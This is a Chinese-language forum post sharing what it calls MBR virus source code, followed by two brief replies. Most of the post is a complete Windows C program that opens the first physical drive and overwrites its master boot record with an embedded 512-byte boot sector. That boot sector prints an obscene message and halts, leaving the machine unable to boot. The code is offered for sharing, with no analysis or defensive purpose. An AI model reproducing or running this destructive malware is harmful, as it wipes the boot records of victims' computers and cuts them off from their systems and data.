MBR病毒源码

Tesla.Angela

一年多前研究MBR时收集的。。。现在无意中翻了出来。。。共享下吧。。。

1. 
   
2. #include "stdafx.h"
   
3. #include "WinIoCtl.h"
   
4. #pragma comment(linker, "/defaultlib:msvcrt.lib /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
   
5. //下面是病毒代码部分
   
6. unsigned char data[512] = {
   
7.         0x8C, 0xC8, 0x8E, 0xD8, 0x8E, 0xC0, 0xE8, 0x03, 0x00, 0xE9, 0xFD, 0xFF, 0xB8, 0x1F, 0x7C, 0x89,
   
8.         0xC5, 0xB9, 0x0C, 0x00, 0xB8, 0x01, 0x13, 0xBB, 0x0C, 0x00, 0xB2, 0x00, 0xCD, 0x10, 0xC3, 0x46,
   
9.         0x75, 0x63, 0x6B, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x21, 0x21, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00,
   
10.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
11.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
12.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
13.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
14.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
15.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
16.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
17.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
18.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
19.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
20.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
21.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
22.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
23.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
24.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
25.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
26.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
27.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
28.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
29.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
30.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
31.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
32.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
33.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
34.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
35.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
36.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
37.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
38.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
    
39. };
    
40. 
    
41. 
    
42. 
    
43. 
    
44. 
    
45. int APIENTRY WinMain(HINSTANCE hInstance,
    
46.                     HINSTANCE hPrevInstance,
    
47.                     LPSTR    lpCmdLine,
    
48.                     int      nCmdShow)
    
49. 
    
50. {
    
51.         
    
52.         // TODO: Place code here.
    
53.         HANDLE hDevice;
    
54.         DWORD dwBytesWritten, dwBytesReturned;
    
55.         BYTE pMBR[512] = {0};
    
56.         
    
57.         // 重新构造MBR
    
58.         memcpy(pMBR, data, sizeof(data) - 1);
    
59.         pMBR[510] = 0x55;
    
60.         pMBR[511] = 0xAA;
    
61.         
    
62.         hDevice = CreateFile
    
63.                 (
    
64.                 "\\\\.\\PHYSICALDRIVE0",
    
65.                 GENERIC_READ | GENERIC_WRITE,
    
66.                 FILE_SHARE_READ | FILE_SHARE_WRITE,
    
67.                 NULL,
    
68.                 OPEN_EXISTING,
    
69.                 0,
    
70.                 NULL
    
71.                 );
    
72.         DeviceIoControl
    
73.                 (
    
74.                 hDevice,
    
75.                 FSCTL_LOCK_VOLUME,
    
76.                 NULL,
    
77.                 0,
    
78.                 NULL,
    
79.                 0,
    
80.                 &dwBytesReturned,
    
81.                 NULL
    
82.                 );
    
83.         // 写入病毒内容
    
84.         WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
    
85.         DeviceIoControl
    
86.                 (
    
87.                 hDevice,
    
88.                 FSCTL_UNLOCK_VOLUME,
    
89.                 NULL,
    
90.                 0,
    
91.                 NULL,
    
92.                 0,
    
93.                 &dwBytesReturned,
    
94.                 NULL
    
95.                 );
    
96.         CloseHandle(hDevice);
    
97.         ExitProcess(-1);
    
98.         return 0;
    
99. }
    

复制代码

From: http://bbs.my0745.com.cn/showtopic-2377.html（链接貌似已经失效）

testid

好帖子，顶一下！

oopww

那个是SHELLCODE的形式么？！~:$